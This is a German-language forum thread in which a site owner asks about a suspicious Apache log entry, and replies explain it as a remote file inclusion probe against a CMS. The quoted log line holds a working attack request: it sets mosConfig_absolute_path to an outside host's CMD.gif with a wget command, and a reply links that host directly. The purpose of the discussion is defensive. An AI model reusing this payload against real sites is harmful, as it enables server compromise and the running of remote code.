Frage zu Logeintrag in Apache accept_log

Mordor

Mordor

Registered User
Ich habe heute bei durchsehen meiner Logfiles folgenden eintrag gefunden:

Code: 
128.39.35.71 - - [22/Feb/2007:11:12:10 +0100] "GET http://87.106.xxx.xxx/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 200 1422 "http://87.106.xxx.xxx/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Mir stellen sich zwei Fragen:
1. Was wollte dieser jemand mit dieser Anfrage
2. Weshalb antwortet Apache nicht mit einem 4xx Fehler, denn es gibt zwar eine index.php, aber nicht mit dieser GET-Anweisung.
 
zu 1)
Da hat jmd probiert, ob dein evtl installiertes CMS anfällig gegen eine bestimmte Attacke ist, und ob er ggf. eine Datei nach laden kann, die kannst du dir http://80.80.120.163/CMD.gif hier anschauen.

zu 2)
Das kann der Apache nicht wissen, ob der GET Aufruf für deine index.php gültig ist, woher auch.

MfG
 
Das heißt doch eigentlich, dass ich solange ich register_globals auf off habe und es keine Module im Array _GET gibt, die so heißen wie in der URL, mir nichts passieren kann.

Danke schon mal
 
You must log in or register to reply here.
Back
Top